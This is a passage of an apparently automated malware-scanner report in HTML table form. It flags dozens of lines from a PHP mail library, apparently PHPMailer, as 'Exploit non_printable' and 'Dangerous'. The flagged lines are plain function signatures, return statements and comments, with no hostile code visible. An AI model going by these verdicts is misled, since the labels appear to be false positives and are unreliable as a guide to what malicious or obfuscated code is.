<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sendmailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1717</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isShellSafe</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1744</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions that access local file paths</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1749</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isPermittedPath</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1751</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'#^[a-z]+://#i'</span><span style="color: #007700">, </span><span style="color: #0000BB">$path</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1763</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1772</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">path header by the receiver</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1804</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to load your own SMTP implementation</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1805</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">SMTP</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1807</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getSMTPInstance</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1812</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">smtp</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1817</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">there is a bad MAIL FROM</span><span style="color: #007700">, </span><span style="color: #0000BB">RCPT</span><span style="color: #007700">, or </span><span style="color: #0000BB">DATA input</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1827</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1883</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">the operation failed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1890</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpConnect</span><span style="color: #007700">(</span><span style="color: #0000BB">$options </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2012</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpClose</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2024</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">it cannot load the language file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2031</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setLanguage</span><span style="color: #007700">(</span><span style="color: #0000BB">$langcode </span><span style="color: #007700">= </span><span style="color: #DD0000">'en'</span><span style="color: #007700">, </span><span style="color: #0000BB">$lang_path </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2058</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #DD0000">',</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2091</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">$foundlang</span><span style="color: #007700">; </span><span style="color: #FF8000">// Returns false if language not found</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2098</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getTranslations</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2100</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2113</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addrAppend</span><span style="color: #007700">(</span><span style="color: #0000BB">$type</span><span style="color: #007700">, </span><span style="color: #0000BB">$addr</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$type </span><span style="color: #007700">. </span><span style="color: #DD0000">': ' </span><span style="color: #007700">. </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">', '</span><span style="color: #007700">, </span><span style="color: #0000BB">$addresses</span><span style="color: #007700">) . </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2129</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addrFormat</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2132</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2134</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">encodeHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">]), </span><span style="color: #DD0000">'phrase'</span><span style="color: #007700">) . </span><span style="color: #DD0000">' <' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wrapText</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$length</span><span style="color: #007700">, </span><span style="color: #0000BB">$qp_mode </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2238</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$message</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2248</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">integer</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2250</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">utf8CharBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$encodedText</span><span style="color: #007700">, </span><span style="color: #0000BB">$maxLength</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2284</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$maxLength</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2295</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setWordWrap</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2317</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The assembled headers</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createHeader</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2414</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getMailMIME</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2462</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns the whole MIME message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2469</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getSentMIMEMessage</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2471</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">mailHeader</span><span style="color: #007700">, </span><span style="color: #DD0000">"\n\r"</span><span style="color: #007700">) . </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">CRLF </span><span style="color: #007700">. </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">CRLF </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2478</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">generateId</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2479</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">uniqid</span><span style="color: #007700">(</span><span style="color: #0000BB">time</span><span style="color: #007700">()));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2484</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns an </span><span style="color: #007700">empty </span><span style="color: #0000BB">string on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2487</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The assembled message body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2489</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createBody</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2675</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned by openssl contains both headers </span><span style="color: #007700">and </span><span style="color: #0000BB">body</span><span style="color: #007700">, </span><span style="color: #0000BB">so need to split them up</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2691</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$body</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2695</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the start of a message boundary</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2703</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$boundary</span><span style="color: #007700">, </span><span style="color: #0000BB">$charSet</span><span style="color: #007700">, </span><span style="color: #0000BB">$contentType</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2728</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the end of a message boundary</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2733</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">endBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$boundary</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2735</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE </span><span style="color: #007700">. </span><span style="color: #DD0000">'--' </span><span style="color: #007700">. </span><span style="color: #0000BB">$boundary </span><span style="color: #007700">. </span><span style="color: #DD0000">'--' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2744</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setMessageType</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2770</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">headerLine</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2772</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$name </span><span style="color: #007700">. </span><span style="color: #DD0000">': ' </span><span style="color: #007700">. </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2776</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">a formatted mail line</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">textLine</span><span style="color: #007700">(</span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
